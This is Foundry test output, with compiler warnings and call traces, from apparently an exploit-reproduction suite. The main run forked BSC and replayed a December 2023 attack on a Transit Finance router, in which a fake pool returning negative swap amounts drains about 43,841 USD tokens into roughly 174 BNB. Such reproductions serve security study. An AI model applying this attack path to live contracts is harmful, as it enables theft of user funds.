Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.23s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-12/TransitFinance_exp.sol:86:9:
   |
86 |         address recipient,
   |         ^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-12/TransitFinance_exp.sol:87:9:
   |
87 |         bool zeroForOne,
   |         ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-12/TransitFinance_exp.sol:88:9:
   |
88 |         int256 amountSpecified,
   |         ^^^^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-12/TransitFinance_exp.sol:89:9:
   |
89 |         uint160 sqrtPriceLimitX96,
   |         ^^^^^^^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-12/TransitFinance_exp.sol:90:9:
   |
90 |         bytes calldata data
   |         ^^^^^^^^^^^^^^^^^^^

Warning (2018): Function state mutability can be restricted to view
  --> src/test/2023-12/TransitFinance_exp.sol:85:5:
   |
85 |     function swap(
   |     ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 553.90ms (6.35ms CPU time)

Ran 1 test for src/test/2023-12/TransitFinance_exp.sol:ContractTest
[PASS] testExploit() (gas: 232035)
Logs:
  Balance BNB before attack: 0.000000000000000001
  Balance USD of router: 43841.867959016089190183
  Balance BNB after attack: 173.907186477338745776

Traces:
  [6495] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("bsc", 34506416 [3.45e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::deal(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1)
    │   └─ ← [Return]
    └─ ← [Stop]

  [242435] ContractTest::testExploit()
    ├─ emit log_named_decimal_uint(key: "Balance BNB before attack", val: 1, decimals: 18)
    ├─ [2531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x00000047bB99ea4D791bb749D970DE71EE0b1A34) [staticcall]
    │   └─ ← [Return] 43841867959016089190183 [4.384e22]
    ├─ emit log_named_decimal_uint(key: "Balance USD of router", val: 43841867959016089190183 [4.384e22], decimals: 18)
    ├─ [206759] 0x00000047bB99ea4D791bb749D970DE71EE0b1A34::exactInputV3Swap{value: 1}(ExactInputV3SwapParams({ srcToken: 0x0000000000000000000000000000000000000000, dstToken: 0x0000000000000000000000000000000000000000, dstReceiver: 0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496, wrappedToken: 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, amount: 1, minReturnAmount: 0, fee: 0, deadline: 1703037709 [1.703e9], pools: [728815563385977040452943777879061427756277306518 [7.288e47], 452312848583266388373324160500822705807063255235247521466952638073588228176 [4.523e74]], signature: 0x, channel: "" }))
    │   ├─ [6874] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::deposit{value: 1}()
    │   │   ├─ emit Deposit(dst: 0x00000047bB99ea4D791bb749D970DE71EE0b1A34, wad: 1)
    │   │   ├─  storage changes:
    │   │   │   @ 0x245bafcf183614e66fd8ffecbf091aaef402981886d54670d1588388a33311fa: 0x000000000000000000000000000000000000000000000000060b331c938e7027 → 0x000000000000000000000000000000000000000000000000060b331c938e7028
    │   │   └─ ← [Stop]
    │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x00000047bB99ea4D791bb749D970DE71EE0b1A34) [staticcall]
    │   │   └─ ← [Return] 435497986799071272 [4.354e17]
    │   ├─ [561] ContractTest::token0() [staticcall]
    │   │   └─ ← [Return] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c
    │   ├─ [559] ContractTest::token1() [staticcall]
    │   │   └─ ← [Return] 0x55d398326f99059fF775485246999027B3197955
    │   ├─ [403] ContractTest::fee() [staticcall]
    │   │   └─ ← [Return] 0
    │   ├─ [4799] ContractTest::swap(0x00000047bB99ea4D791bb749D970DE71EE0b1A34, true, 1, 4295128740 [4.295e9], 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e149600000000000000000000000000000000000000000000000000000000000000400000000000000000000000000000000000000000000000000000000000000040000000000000000000000000bb4cdb9cbd36b01bd1cbaebf2de08d9173bc095ce3b91515faba4076e729fd79b6485a46bd17b308916cea1d9e1ce9a84ff53ee4)
    │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x00000047bB99ea4D791bb749D970DE71EE0b1A34) [staticcall]
    │   │   │   └─ ← [Return] 43841867959016089190183 [4.384e22]
    │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x00000047bB99ea4D791bb749D970DE71EE0b1A34) [staticcall]
    │   │   │   └─ ← [Return] 43841867959016089190183 [4.384e22]
    │   │   └─ ← [Return] -43841867959016089190183 [-4.384e22], -43841867959016089190183 [-4.384e22]
    │   ├─ [266] 0x36696169C63e42cd08ce11f5deeBbCeBae652050::token0() [staticcall]
    │   │   └─ ← [Return] 0x55d398326f99059fF775485246999027B3197955
    │   ├─ [308] 0x36696169C63e42cd08ce11f5deeBbCeBae652050::token1() [staticcall]
    │   │   └─ ← [Return] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c
    │   ├─ [251] 0x36696169C63e42cd08ce11f5deeBbCeBae652050::fee() [staticcall]
    │   │   └─ ← [Return] 500
    │   ├─ [130904] 0x36696169C63e42cd08ce11f5deeBbCeBae652050::swap(0x00000047bB99ea4D791bb749D970DE71EE0b1A34, true, 43841867959016089190183 [4.384e22], 4295128740 [4.295e9], 0x01000000000000000000000036696169c63e42cd08ce11f5deebbcebae6520500000000000000000000000000000000000000000000000000000000000000040000000000000000000000000000000000000000000000000000000000000004000000000000000000000000055d398326f99059ff775485246999027b3197955c472bae540044f07329abf33830ef75493abc0d2c512713138a7906da9776bff)
    │   │   ├─ [2448] 0x4d67dc640f5327D0e1c7C6537eD8542aaf46cf99::accumulateReward(1703037709 [1.703e9])
    │   │   │   └─ ← [Stop]
    │   │   ├─ [15508] 0x4d67dc640f5327D0e1c7C6537eD8542aaf46cf99::crossLmTick(-55300 [-5.53e4], true)
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x8a230769f4450d4e488b74ca256a1aa7160e2d7469c960c106690682be641af9: 0x000000000000000000000000000000000f5ff7273717f00108de985230218e4b → 0x0000000000000000000000000000000002c47a01a6c179e3804080938094a2dd
    │   │   │   │   @ 3: 0x00000000000000000000000165824b0d00000000000534c006f8bc98407001a6 → 0x00000000000000000000000165824b0d00000000000534afd365b0e001707084
    │   │   │   └─ ← [Stop]
    │   │   ├─ [8062] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(0x00000047bB99ea4D791bb749D970DE71EE0b1A34, 173907186477338745776 [1.739e20])
    │   │   │   ├─ emit Transfer(from: 0x36696169C63e42cd08ce11f5deeBbCeBae652050, to: 0x00000047bB99ea4D791bb749D970DE71EE0b1A34, value: 173907186477338745776 [1.739e20])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x245bafcf183614e66fd8ffecbf091aaef402981886d54670d1588388a33311fa: 0x000000000000000000000000000000000000000000000000060b331c938e7028 → 0x000000000000000000000000000000000000000000000009737da3d020f2cbd8
    │   │   │   │   @ 0xf398c0878886fbe9ddcca4240ffdc3ab6a71e3d8caebbc2d009dac30c6555b68: 0x0000000000000000000000000000000000000000000015de3280cc47dfe7fd36 → 0x0000000000000000000000000000000000000000000015d4c50e5b945283a186
    │   │   │   └─ ← [Return] true
    │   │   ├─ [2531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x36696169C63e42cd08ce11f5deeBbCeBae652050) [staticcall]
    │   │   │   └─ ← [Return] 9485011174029608430218334 [9.485e24]
    │   │   ├─ [19483] 0x00000047bB99ea4D791bb749D970DE71EE0b1A34::pancakeV3SwapCallback(43841867959016089190183 [4.384e22], -173907186477338745776 [-1.739e20], 0x01000000000000000000000036696169c63e42cd08ce11f5deebbcebae6520500000000000000000000000000000000000000000000000000000000000000040000000000000000000000000000000000000000000000000000000000000004000000000000000000000000055d398326f99059ff775485246999027b3197955c472bae540044f07329abf33830ef75493abc0d2c512713138a7906da9776bff)
    │   │   │   ├─ [8871] 0x55d398326f99059fF775485246999027B3197955::transfer(0x36696169C63e42cd08ce11f5deeBbCeBae652050, 43841867959016089190183 [4.384e22])
    │   │   │   │   ├─ emit Transfer(from: 0x00000047bB99ea4D791bb749D970DE71EE0b1A34, to: 0x36696169C63e42cd08ce11f5deeBbCeBae652050, value: 43841867959016089190183 [4.384e22])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xe5e58e8302075d7f9461b9d9a397e1ee6768a5f320c4b18cd4f8a518b3b251b4: 0x000000000000000000000000000000000000000000000948ac24008dadfbff27 → 0
    │   │   │   │   │   @ 0x4b4dfb61299ca62a744d1ae05c6e24e84740e94efd86eec09992191d35df35c4: 0x00000000000000000000000000000000000000000007d8877c6d8cf35e4e2c5e → 0x00000000000000000000000000000000000000000007e1d028918d810c4a2b85
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Stop]
    │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x36696169C63e42cd08ce11f5deeBbCeBae652050) [staticcall]
    │   │   │   └─ ← [Return] 9528853041988624519408517 [9.528e24]
    │   │   ├─ emit Swap(param0: 0x00000047bB99ea4D791bb749D970DE71EE0b1A34, param1: 0x00000047bB99ea4D791bb749D970DE71EE0b1A34, param2: 43841867959016089190183 [4.384e22], param3: -173907186477338745776 [-1.739e20], param4: 4990168276089522510497003971 [4.99e27], param5: 6871982296254711524581723 [6.871e24], param6: -55301 [-5.53e4], param7: 7453117553032735162 [7.453e18], param8: 0)
    │   │   ├─  storage changes:
    │   │   │   @ 2: 0x000000000000000000000000000000001fdd7c921d0f8d5898ef0d99d56b1f0a → 0x000000000000000000000000000000001fdd9fe4c33919b889bd6a58624ffd06
    │   │   │   @ 0xeec72fa961e405d7429d4b1c14a7b063200f1c2195e8b2b6ab4b176e02b44d91: 0x000000000000000000000000000000000c1c9a54634fd1f1cf5abcd2b9096966 → 0x0000000000000000000000000000000013c10586a6f10520c5197fc252aa68e4
    │   │   │   @ 4: 0x00000000000000038751ea157e480078000000000000036b568da3d13dc82d4e → 0x00000000000000038751ea157e480078000000000000036bbdfc6ebe5786d708
    │   │   │   @ 5: 0x00000000000000000000000000000000000000000005af2625ef7999e6200c56 → 0x00000000000000000000000000000000000000000005af32e82061057d6d615b
    │   │   │   @ 0xeec72fa961e405d7429d4b1c14a7b063200f1c2195e8b2b6ab4b176e02b44d93: 0x01649943e500000000000000000001886bcbddd988a4ee612fffff9d8d9a6112 → 0x0100e90728000000000000000000000018f3972a91a72bfadaffff3ec9664712
    │   │   │   @ 0xeec72fa961e405d7429d4b1c14a7b063200f1c2195e8b2b6ab4b176e02b44d92: 0x00000000000000000000000000000000000b8a112e9226dcc2b3606a83a90634 → 0x000000000000000000000000000000000015aaacde3cf4234cda6a37eb9127f1
    │   │   │   @ 0: 0x000000038403840160ff2804000000000000000010216dd3767902d4fbbe0e7e → 0x000000038403840160ff27fb0000000000000000101fc53c4cdb8fb28c6339c3
    │   │   └─ ← [Return] 43841867959016089190183 [4.384e22], -173907186477338745776 [-1.739e20]
    │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x00000047bB99ea4D791bb749D970DE71EE0b1A34) [staticcall]
    │   │   └─ ← [Return] 174342684464137817048 [1.743e20]
    │   ├─ [10524] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::withdraw(173907186477338745776 [1.739e20])
    │   │   ├─ [1384] 0x00000047bB99ea4D791bb749D970DE71EE0b1A34::fallback{value: 173907186477338745776}()
    │   │   │   ├─ emit Receipt(: 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, : 173907186477338745776 [1.739e20])
    │   │   │   └─ ← [Stop]
    │   │   ├─ emit Withdrawal(src: 0x00000047bB99ea4D791bb749D970DE71EE0b1A34, wad: 173907186477338745776 [1.739e20])
    │   │   ├─  storage changes:
    │   │   │   @ 0x245bafcf183614e66fd8ffecbf091aaef402981886d54670d1588388a33311fa: 0x000000000000000000000000000000000000000000000009737da3d020f2cbd8 → 0x000000000000000000000000000000000000000000000000060b331c938e7028
    │   │   └─ ← [Stop]
    │   ├─ [55] ContractTest::receive{value: 173907186477338745776}()
    │   │   └─ ← [Stop]
    │   ├─ emit TransitSwapped(param0: 0x0000000000000000000000000000000000000000, param1: 0x0000000000000000000000000000000000000000, param2: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param3: 1, param4: 173907186477338745776 [1.739e20], param5: 0, param6: "")
    │   └─ ← [Return] 173907186477338745776 [1.739e20]
    ├─ emit log_named_decimal_uint(key: "Balance BNB after attack", val: 173907186477338745776 [1.739e20], decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 8.92s (7.67s CPU time)

Ran 2 test suites in 10.02s (9.47s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
